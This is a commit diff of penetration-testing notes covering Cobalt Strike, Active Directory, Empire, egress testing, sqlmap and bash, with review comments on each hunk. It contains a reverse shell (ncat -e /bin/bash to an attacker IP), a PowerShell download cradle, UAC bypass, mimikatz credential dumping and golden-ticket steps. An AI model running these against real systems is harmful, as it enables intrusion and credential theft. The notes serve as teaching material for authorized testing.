Add Linux and AD notes, spellcheck.
leebaird committed Feb 28, 2022
1 parent 0634bc7 commit 599ea20
Showing 16 changed files with 168 additions and 131 deletions.
9 changes: 5 additions & 4 deletions notes/Cobalt-Strike.txt
@@ -1,5 +1,6 @@
Cobalt Strike


Use the following install location: /opt/cobaltstrike/
This will allow you to get third-party apps installed when running /opt/discover/update.sh

Expand All @@ -12,7 +13,7 @@ Remove old data and Beacons (optional)
rm -rf data/

Start the team server
There are 2 mandotory parameters and 2 optional parameters. The first 2 parameters are required.
There are 2 mandatory parameters and 2 optional parameters. The first 2 parameters are required.
./teamserver <IP> <password> [Malleable C2 profile] [kill date for Beacons yyyy-mm-dd]

./teamserver 192.168.1.5 password malleable-c2-profiles/APT/etumbot.profile 2021-12-31
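Review bot: the example kill date on the teamserver line is already in the past relative to this commit (Feb 2022): `./teamserver 192.168.1.5 password malleable-c2-profiles/APT/etumbot.profile 2021-12-31`. A Beacon stage built with a kill date that has passed refuses to run and exits on check-in, so a reader who copies the line as-is gets nothing back. Use a placeholder such as `<yyyy-mm-dd>` or a date clearly in the future, and replace the literal `password` with a placeholder so nobody starts a teamserver with a weak shared secret by copy-paste.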
Expand All @@ -31,7 +32,7 @@ Start the team server
User: <your name>
Password: <password you entered from above>
Connect
VerifyFingerprint (SHA256 hash from above) > Yes
Verify Fingerprint (SHA256 hash from above) > Yes

- Remote connection
OPSEC: Never allow a client to make direct connections to your team server. Always use SSH and locally forward the connection.
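Review bot: the connect step `Verify Fingerprint (SHA256 hash from above) > Yes` says to accept, but not what to do on a mismatch. State that the value in the dialog must equal the fingerprint the teamserver printed at startup and that any difference means the client is talking to the wrong server and the connection must be refused. This dialog is the only server-authentication check the client performs, which is also why the OPSEC line about SSH-forwarding the connection matters.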
Expand Down Expand Up @@ -104,7 +105,7 @@ Save > OK

OPSEC: Staged payloads are typically less secure.
Always prefer a fully staged or stageless payload and disable payload staging.
When you see (S) in the framwork, it refers to a stageless payload.
When you see (S) in the framework, it refers to a stageless payload.

Disable Windows Defender on your target Windows VM.
Enterprise: Windows Security > Virus & threat protection > Manage settings > turn off Real-time protection > Yes
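Review bot: the context line `Always prefer a fully staged or stageless payload and disable payload staging.` contradicts the sentence before it (`OPSEC: Staged payloads are typically less secure.`); a fully staged payload is the thing being warned against. Drop `fully staged or` so it reads `Always prefer a stageless payload and disable payload staging.`, which matches the `(S)` explanation fixed in this hunk.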
Expand Down Expand Up @@ -197,7 +198,7 @@ ctrl+k will clear the current window.

# Commands

run Execute a shel command via cmd.exe
run Execute a shell command via cmd.exe
powerpick Execute PowerShell via Unmanaged PowerShell
psinject Inject Unmanaged PowerShell into a process
powershell-inport Import a PowerShell script
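Review bot: the spellcheck fixed `shel` but left `powershell-inport Import a PowerShell script` two lines below; the Beacon command is `powershell-import`, and a reader copying the table will get an unknown-command error. Same one-character fix as the `run` line.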
18 changes: 12 additions & 6 deletions notes/active-directory.txt
Expand Up @@ -48,14 +48,14 @@ Login with username and password: neo4j
Set a new password.

cd /opt/BloodHound-v4/Collectors/
python -m SimpleHTTPServer
python3 -m http.server

- Windows
cd to a discrete, writable directory (C:\Users\<user>\Desktop)
powershell -nop -exec bypass "IEX (New-Object Net.Webclient).DownloadFile('http://192.168.1.5:8000/SharpHound.exe', 'SharpHound.exe')"

SharpHound.exe -c LoggedOn Run the following as a user that has admin rights
SharpHound.exe -c Session On subseqequent runs just collect session data
SharpHound.exe -c Session On subsequent runs just collect session data

This will generate a zip file
Upload the file to Kali
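Review bot: in `powershell -nop -exec bypass "IEX (New-Object Net.Webclient).DownloadFile('http://192.168.1.5:8000/SharpHound.exe', 'SharpHound.exe')"` the `IEX` is wrong: `DownloadFile` returns nothing, so once the download completes Invoke-Expression is handed $null and prints a parameter-binding error. Drop `IEX` and call the method on its own, and prefer an absolute destination path over `'SharpHound.exe'`, because WebClient resolves relative paths against the process working directory, not PowerShell's current location. The `python3 -m http.server` swap is correct; both servers default to port 8000, so the URL still matches.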
Expand Down Expand Up @@ -107,18 +107,24 @@ Search xml files for cpassword.
GetDecryptedCpassword 'AES 256-bit encrypted password'
------------------------------------------------------------------------------------------------------------------------------------------------------

# Key terms

- Kerberos
The default authentication mechanism in Active Directory. It uses ticket-based authentication. A Key Distribution Center (KDC) grants a
Ticket-Granting Ticket (TGT) to a user who requests access to a service or an account. This ticket can be redeemed to generate a service ticket (ST)
Ticket Granting Ticket (TGT) to a user who requests access to a service or an account. This ticket can be redeemed to generate a service ticket (ST)
to access a particular service.

A user starts the communication process for a service request to a server with the service they want to access.
Every DC runs a Kerberos Distribution Center (KDC) service that processes all requests for Kerberos tickets.
The KBRTGT account acts as a service account for the KDC.
It contains three parts: Database, Authentication Server (AS), and Ticket Granting Server (TGS).
The AS verifies client authentication. If the logged user is authenticated successfully the AS issues a ticket called TGT.
Ticket Granting Ticket (TGT) confirms to other servers that user has been authenticated.
Ticket Granting Server (TGS): User request for TGS from the KDC that will be used to access the service of the application server.

- Ticket Granting Server (TGS)

- Service Principal Name (SPN)
A unique name for a service account that is used by Kerberos to associate a service instance with service logon account. This allows a client
application to request that the service authticate an account even if the client does not have the account name.
application to request that the service authenticate an account even if the client does not have the account name.

- Kerberoasting
Request the TGS ticket, which has the password hash of the SPN account, then crack it offline.
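Review bot: the added Kerberos paragraph introduces two errors the spellcheck did not catch, and both contradict the definition directly above it: `Every DC runs a Kerberos Distribution Center (KDC) service` should read Key Distribution Center, as in the first bullet, and `The KBRTGT account acts as a service account for the KDC.` should be `KRBTGT`, the account's actual name. The new heading `- Ticket Granting Server (TGS)` has no body; either give it one (the client presents its TGT to the TGS to obtain a service ticket for a given SPN) or delete it and keep the TGS sentence in the paragraph above, which itself needs rewording since `User request for TGS from the KDC ...` is not a sentence.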
17 changes: 12 additions & 5 deletions notes/bash.txt
Expand Up @@ -30,8 +30,8 @@ wc -l Count the number o
wc -m Count the number of characters

comm file1 file2 file1, file2, shared by both files
comm -<123> file1 file2 Used to supress columns
comm -12 file1 file2 Supress columns 1 and 2
comm -<123> file1 file2 Used to suppress columns
comm -12 file1 file2 Suppress columns 1 and 2
diff -<c or u> file1 file2
vimdiff file1 file2
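Review bot: the `comm` entries do not say that both inputs must be sorted in the same collation, which is the usual reason `comm -12 file1 file2` silently reports no common lines. Add that, or show the form `comm -12 <(sort file1) <(sort file2)`, and spell out the column numbering behind `comm -<123>` (1 = only in file1, 2 = only in file2, 3 = in both), since the current description is easy to misread.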
------------------------------------------------------------------------------------------------------------------------------------------------------
Expand All @@ -44,7 +44,7 @@ column -t Align columns
sed /^$/d Compress blank lines
paste -s -d" " Convert a list into a single line

apt-get install xml-twig-tools
apt install xml-twig-tools
xml_grep ‘firstName' file.xml --text_only Extract data from XML element

grep -oe '[a-zA-Z0-9._]\+@[a-zA-Z]\+.[a-zA-Z]\+' Find emails
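Review bot: two context lines in this hunk have defects a spellcheck pass would miss. `xml_grep ‘firstName' file.xml --text_only` opens the element name with a typographic quote `‘` and closes it with a straight one, so the shell passes the curly character through as part of the argument; use straight single quotes on both sides. In `grep -oe '[a-zA-Z0-9._]\+@[a-zA-Z]\+.[a-zA-Z]\+'` the dot between domain and TLD is unescaped and matches any character, and the domain class allows no hyphens or dots; `\.` and `[a-zA-Z0-9.-]\+` would be closer to what the comment promises.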
Expand Down Expand Up @@ -74,7 +74,7 @@ awk '/FOO/ { FOO = 1; next } FOO == 1 && /^$/ { FOO = 0; next } { FOO = 0 } {
awk -v n=-2 'NR==n+1 {if($0 ~ /BAR/) { next; } else { print hold } } /FOO/ {n=NR;hold=$0;next}1'
Find FOO, if the next line contains BAR, delete both lines

sed 's/.* //' Find lines that contin a space and print from the space to the end of the line
sed 's/.* //' Find lines that contain a space and print from the space to the end of the line
grep -E 'FOO|BAR' Find lines that contain FOO or BAR
grep '[0-9]' Find lines that contain a number
grep '[0-9]$' Find lines that end with a number
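Review bot: the description for `sed 's/.* //'` is misleading: the greedy `.* ` strips everything up to and including the last space, so what is printed is the text after the last space, and lines without a space are printed unchanged rather than selected. Suggest `Print the text after the last space on each line`.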
Expand Down Expand Up @@ -155,6 +155,13 @@ tr '[A-Z]' '[a-z]' Translate upper ca
sed "s/$FOO./$FOO/g" Variables - use double quotes with sed or grep
------------------------------------------------------------------------------------------------------------------------------------------------------

# String together commands

semicolon (;) Does not depend on the first command completing with no errors
double ampersand (&&) Depends on the first command completing with no errors
pipe (|) Uses output from the first command as input to the second command
------------------------------------------------------------------------------------------------------------------------------------------------------

# Check for argument. If not given, print the usage
if [ -z "$1" ]; then
echo "Usage: $0 <domain name>"
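Review bot: the new `# String together commands` list omits `||` (double pipe), which runs the second command only when the first fails and is the natural counterpart of the `&&` entry; adding it would also tie the table to the error-handling pattern in the `# Check for argument` snippet below. Worth stating too that `cmd1 | cmd2` returns the exit status of `cmd2`, so `&&` after a pipe does not tell you whether `cmd1` succeeded unless `set -o pipefail` is in effect.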
Expand Down Expand Up @@ -203,7 +210,7 @@ else
echo
fi

# Validate input is a number and greather than 0
# Validate input is a number and greater than 0
if ! [[ $number =~ ^[0-9]+$ ]] || [[ $number -le 0 ]]; then
f_error
fi
2 changes: 1 addition & 1 deletion notes/consulting.txt
Expand Up @@ -7,7 +7,7 @@ Consulting
4 port switch
25’ CAT6 cable
(2) 6’ CAT6 cables
(2) Thunderbolt to Ethernet adaptors
(2) Thunderbolt to Ethernet adapters

# Dress
No hats.
4 changes: 2 additions & 2 deletions notes/databases.txt
Expand Up @@ -147,7 +147,7 @@ Login > Profile > flag
1. Locate a system running Oracle.
2. Determine Oracle version.
3. Determine Oracle SID.
4. Guess/Bruteforce USERNAME/PASS.
4. Guess/Brute force USERNAME/PASS.
5. Privilege escalation via SQL injection.
6. Manipulate data/post exploitation.
7. Cover tracks.
Expand Down Expand Up @@ -264,7 +264,7 @@ admin’;--

# sqlmap

Capture a longin with Burp and save to req.txt
Capture a login with Burp and save to req.txt

sqlmap -r req.txt --level=5 --risk=3
sqlmap -u "http://target/index.html?page=1" --dbs --dump --batch Show all dbs
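Review bot: `sqlmap -r req.txt --level=5 --risk=3` needs a caveat in the note: `--risk=3` enables the OR-based boolean payloads, which can modify or delete rows if the injectable parameter sits inside an UPDATE or DELETE statement, so it should not be the default on a client engagement. Say to start at the default risk and raise it deliberately, and that `--dbs --dump --batch` on the next line dumps every database without prompting.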
18 changes: 9 additions & 9 deletions notes/egress.txt
@@ -1,21 +1,21 @@
Egress


target - Ubuntu 10.0.0.10
target2 - Windows 10.0.0.11
attacker 10.0.0.5
target - Ubuntu 10.0.0.10
target2 - Windows 10.0.0.11
attacker 10.0.0.5

# netcat
target nc 10.0.0.5 80
attacker nc -lvp 80
target nc 10.0.0.5 80
attacker nc -lvp 80

# ncat
target ncat 10.0.0.5 --ssl -e /bin/bash
attacker ncat -l 443 --ssl
target ncat 10.0.0.5 --ssl -e /bin/bash
attacker ncat -l 443 --ssl

# cryptcat
target cryptcat 10.0.0.5 80 -k password
attacker cryptcat -lvp 80 -k password
target cryptcat 10.0.0.5 80 -k password
attacker cryptcat -lvp 80 -k password

# Egress-Assess

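Review bot: the ncat pair will not connect as written: `target ncat 10.0.0.5 --ssl -e /bin/bash` gives no port, and ncat defaults to 31337 in connect mode, while the listener is `attacker ncat -l 443 --ssl`. Add `443` to the target line. Since this hunk only realigns whitespace it is a good moment to fix that, and to note that the plain `nc` pair has no `-e`, so it only tests whether port 80 egress is open rather than returning a shell.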
78 changes: 39 additions & 39 deletions notes/empire.txt
Expand Up @@ -3,22 +3,22 @@ Empire

cd /opt/Empire
./empire
help Show main help menu
listeners Change to the listener menu
help Show listener commands
uselistener <tab 2x> Show the different types of listeners
uselistener http Select a listener
info Show info about the listener
help Show main help menu
listeners Change to the listener menu
help Show listener commands
uselistener <tab 2x> Show the different types of listeners
uselistener http Select a listener
info Show info about the listener
set Port 4443
execute Execute the listener
back You should see a new active listener
execute Execute the listener
back You should see a new active listener

launcher Show the format
launcher powershell http Creates a PowerShell one-liner
launcher Show the format
launcher powershell http Creates a PowerShell one-liner
Copy all of the code.
Open a new Terminal.
cd /var/www/html
vim shell.bat Paste in the code
vim shell.bat Paste in the code
service apache2 start

- Windows
Expand All @@ -28,35 +28,35 @@ Open a Command Prompt, paste in the code, and press enter.

- Kali
In a few seconds, you will see the initial agent response.
main You should see 1 listener and 1 agent
agents Show active agents
rename <original name> <new name> Rename agent to something user friendly
rename <original name> initial Rename agent to something user friendly
interact initial Interact with the agent using new name
main You should see 1 listener and 1 agent
agents Show active agents
rename <original name> <new name> Rename agent to something user friendly
rename <original name> initial Rename agent to something user friendly
interact initial Interact with the agent using new name

usemodule powershell/privesc/bypassuac Select a module
info Show info about the module
run Default time is 5 sec
usemodule powershell/privesc/bypassuac Select a module
info Show info about the module
run Default time is 5 sec

info Look for high_integrity 0. This means we are not admin yet.
info Look for high_integrity 0. This means we are not admin yet.

usemodule powershell/privesc/powerup/allchecks
info
set Agent http Use the listeners name run
set Agent http Use the listeners name run

You should see a new listener.

back
list

One of the agents under Username should have an asterisk. This means power user.
One of the agents under Username should have an asterisk. This means power user

rename <name> <name2>
interact <name2>
Info Look for high_integrity 1, this means we are admin yet
creds Show cleartext passwords (empty)
mimikatz Wait a few
creds Show cleartext passwords
Info Look for high_integrity 1, this means we are admin yet
creds Show cleartext passwords (empty)
mimikatz Wait a few
creds Show cleartext passwords

usemodule persistence/elevated/schtasks
info
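Review bot: two context lines in this hunk still read wrongly after the realignment: `Info Look for high_integrity 1, this means we are admin yet` should say `admin now` (it is the counterpart of the `high_integrity 0 ... not admin yet` line above), and the command should be lowercase `info` for consistency with every other entry. `set Agent http Use the listeners name run` also runs two instructions into one; move `run` onto its own line.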
Expand All @@ -67,7 +67,7 @@ y
------------------------------------------------------------------------------------------------------------------------------------------------------

sysinfo
shell Get-Process Show running processes
shell Get-Process Show running processes
shell ipconfig
shell whoami

Expand All @@ -80,11 +80,11 @@ info
execute
------------------------------------------------------------------------------------------------------------------------------------------------------

kill <name> Kill agent
kill <name> Kill agent

usestager <tab 2x> Show the different types of stagers
usestager windows/launcher_bat Select a stager
info Show info about the stager
usestager <tab 2x> Show the different types of stagers
usestager windows/launcher_bat Select a stager
info Show info about the stager

usemodule powershell/privesc/powerup/allchecks
info
Expand All @@ -94,17 +94,17 @@ execute
back
bypassuac initial
y
agents Look for the *, which means a high integrity agent
interact <name*> Use name for the high integrity agent
agents Look for the *, which means a high integrity agent
interact <name*> Use name for the high integrity agent
rename PhishedHigh
ps See who else is on the box
psinject initial <PID> PID of other user's process
ps See who else is on the box
psinject initial <PID> PID of other user's process
info
execute

agents
list
interact <name**> Use name for the second user
interact <name**> Use name for the second user
usemodule situational_awareness/network/find_localadmin_access
info
execute
Expand All @@ -117,7 +117,7 @@ set Listener initial
execute

agents
interact <name***> Use name for the second user with the high integrity agent
interact <name***> Use name for the second user with the high integrity agent
rename DC
usemodule credentials/mimikatz/lsadump
info
Expand All @@ -126,15 +126,15 @@ execute
creds
agents
interact PhishedUser
dir \\PRIMARY\C$ Access denied
dir \\PRIMARY\C$ Access denied
usemodule credentials/mimikatz/golden_ticket
info
set CredID 1
set user Administrator
execute

back
dir \\PRIMARY\C$ Access granted
dir \\PRIMARY\C$ Access granted
------------------------------------------------------------------------------------------------------------------------------------------------------

Example 2
2 changes: 1 addition & 1 deletion notes/forensics.txt
Expand Up @@ -9,7 +9,7 @@ hdc  secondary master IDE 
hdd  secondary slave IDE
------------------------------------------------------------------------------------------------------------------------------------------------------

# SCSI, USB or SATA hard drive naming conventions 
# SCSI, USB, or SATA hard drive naming conventions 

sda  1st
sdb  2nd
6 changes: 5 additions & 1 deletion notes/kali.txt
Expand Up @@ -58,6 +58,10 @@ View
Editor
Tab width: 5
Tab mode: Insert Spaces
Window
Enable Client-side decorations
Plugins
Enable Spell Checking
Close > quit mousepad
------------------------------------------------------------------------------------------------------------------------------------------------------

Expand Down Expand Up @@ -122,7 +126,7 @@ service ssh start Start ssh
netstat -antp | grep ssh Verify the ssh service is running

service apache2 start Start Apache
xdg-open localhost Verify the Apache service is running
xdg-open localhost Verify the Apache service is running
/var/www/html/ Document root

update-rc.d <service> <enable|disable> Enable a service to start at boot time
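Review bot: `xdg-open localhost Verify the Apache service is running` passes a bare hostname, which xdg-open treats as a file path rather than a URL, so it fails with a file-not-found error; use `xdg-open http://localhost`. The same block relies on `netstat -antp` and `update-rc.d`; on current Kali `ss -tlnp` and `systemctl enable <service>` are the supported equivalents, and net-tools may not be installed by default, so a reader on a fresh install may find the first command missing.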